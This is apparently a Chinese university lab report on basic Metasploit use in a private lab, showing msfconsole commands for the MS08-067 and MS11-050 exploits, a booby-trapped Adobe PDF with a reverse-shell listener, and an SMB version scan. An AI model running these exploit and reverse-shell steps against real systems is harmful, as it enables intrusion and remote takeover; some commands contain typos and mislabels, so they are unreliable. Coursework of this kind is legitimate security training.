20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良《网络对抗》Exp5 MSF基础应用
实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
实践过程
Windows服务渗透攻击——MS08-067安全漏洞
- 攻击机:kali IP:192.168.11.129
- 靶机:windows XP SP3 (English) IP:192.168.11.130
首先在kali中打开命令行进入
msfconsole
控制台,然后输入命令search ms08_067
查询攻击模块
然后输入命令
show payloads
查看可用的攻击载荷,发现payload generic/shell_reverse_tcp
可用,输入命令set payload generic/shell_reverse_tcp
设置载荷。
输入
set LHOST 192.168.11.129
设置攻击机IP
输入
set LPORT 5323
设置端口
输入
set RHOST 192.168.11.130
设置靶机IP
输入
set target 0
设置自动选择目标系统类型
输入
exploit
开始攻击
一开始使用中文版xp一直提示无法创建,后来换了英文版xp才攻击成功
systeminfo
命令可查看靶机信息
浏览器渗透攻击——MS11-050
攻击机:kali IP:192.168.11.129
靶机:windows XP SP3 (中文简体) IP:192.168.11.128
还是打开
msfconsole
控制台,然后输入命令use windows/browser/ms11_050_mshtml_cobjectelement
设置攻击模块
输入
set payload windows/meterpreter/reverese_http
设置payload
输入
set LHOST 192.168.11.129
设置攻击机IP
输入
set LPORT 5323
设置端口
输入
set URIPATH baidu
设置统一资源标识符路径
输入
set target 1
输入
exploit
开始攻击
然后在靶机上打开IE浏览器,输入刚刚生成的网址
http://192.168.11.129:8080/baidu
但是这里IE浏览器就失去反应了,询问了其他同学也没有解决方法。
针对Office软件的渗透攻击——MS10-087
还是打开
msfconsole
控制台,输入use windows/fileformat/adobe_cooltype_sing
设置攻击模块
输入
use windows/fileformat/adobe_cooltype_sing
设置payload
输入
set LHOST 192.168.11.129
设置攻击机IP
输入
set LPORT 5323
设置端口
输入
set FILENAME exp5_5336.pdf
设置生成文件名
输入
exploit
开始攻击
这里我们生成了一个文件
exp5_5336.pdf
但是由于kali隐藏了部分文件夹,我们需要手动设置显示隐藏文件夹才能找到这个pdf文件
输入
back
返回,然后输入use exploit/multi/handler
开始监听
输入
set payload windows/meterpreter/reverse_tcp
反向连接tcp
输入
set LHOST 192.168.11.129
设置攻击机IP
输入
set LPORT 5323
设置端口
输入
exploit
开始攻击
然后把生成的pdf文件传到xp系统中并且打开
攻击成功,可以输入ipconfig查看ip信息
成功应用任何一个辅助模块
打开
msfconsole
控制台输入show auxiliary
查看辅助模块
输入
use auxiliary/scanner/smb/smb_version
选择辅助模块
输入
show options
查看需要设置什么并设置
应用成功
回答问题
(1)用自己的话解释什么是exploit,payload,encode
exploit: 就是利用发现的漏洞和配置好的信息攻击靶机的指令
payload:攻击载荷,在它传到靶机中后执行相应的代码
encode:编码器
实践总结与体会
这次实验并不困难,但是模块太多,第一次接触有点眼花缭乱,所以只能跟着其他同学做,有空希望自己可以试试更多的模块。还有第一个实践不知道为什么其他同学的中文xp系统可以攻击,我的xp关闭了防火墙,也可以和kali互ping,但是还是攻击失败,最后只能选择英文版xp。
离实战还缺些什么技术或步骤?
还差的很远,尝试过的模块只是九牛一毛,如果要实战还需要很多时间去研究其他模块。
20155323刘威良《网络对抗》Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20155323刘威良 网络对抗《网络攻防》 Exp1 PC平台逆向破解(5)M
实践目标 本次实践的对象是linux的可执行文件 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可 ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
随机推荐
- SurfaceView获取本地视频播放
1.定义 可以直接从内存或者DMA等硬件接口取得图像数据,是个非常重要的绘图容器. 它的特性是:可以在主线程之外的线程中向屏幕绘图上.这样可以避免画图任务繁重的时候造成主线程阻塞,从而提高了程序的反应 ...
- AndroidStudio 3.0升级之compile、implementation简要说明
1.现象 androidStudio 升级至3.0后 之前引用库所使用的complie默认变成implementation 如以下: 3.0之前 compile 'io.reactivex.rxjav ...
- Django ModelForm类生成表单
1. 定义ModelForm类 #froms.py from django import forms from app01.modles import User class UserModelForm ...
- SublimeText3常用插件及快捷键总结
SublimeText可谓是前端工程师的代码编辑神器,自从用上它以后一直爱不释手,特别是它强大的插件功能,简直要逆天了.网上也有很多关于SublimeText3的各种插件介绍,其插件功能之多,让人眼花 ...
- SQL Server数据库中外键强制约束的好处是什么,什么时候设置外键非强制约束?(转载)
Sql Server: What is the benefit of using “Enforce foreign key constraint” when it's set to “NO”? 问 I ...
- Sql Server 中如果使用TransactionScope开启一个分布式事务,使用该事务两个并发的连接会互相死锁吗
提问: 如果使用TransactionScope开启一个分布式事务,使用该事务两个并发的连接会互相死锁吗? 如果在.Net中用TransactionScope开启一个事务. 然后在该事务范围内启动两个 ...
- sqlite 字符串拼接
select path || '%' from t_category where depth = 0 and type = 0 用'||'拼接字符串 比如path是/1001/的话 那结果就是/10 ...
- IE 出现stack overflow 报错的原因归纳
1. 重定义了系统的触发事件名称作为自定义函数名如: onclick / onsubmit ... 都是系统保留的事件名称,不允许作为重定义函数名称: 2. IE缓存满了,无法写入.解决办法:清空 ...
- MySQL基础之 存储引擎
MyISAM存储引擎 缺点:不支持事务,不支持外键.只支持表级锁. 优点:访问速度快,多用于select.insert语句的高负载操作.仅仅支持全文索引. MyISAM缓存在内存的是索引,不是数据.而 ...
- 'javac' 不是内部或外部命令,也不是可运行的程序
今天在命令行中运行javac命令时发现 但是运行java命令却可以 查找jdk的安装路径发现,安装目录里面同时有jdk的文件夹和jre的文件夹 查看了jdk的目录发现jdk目录中也有一个jre文件夹 ...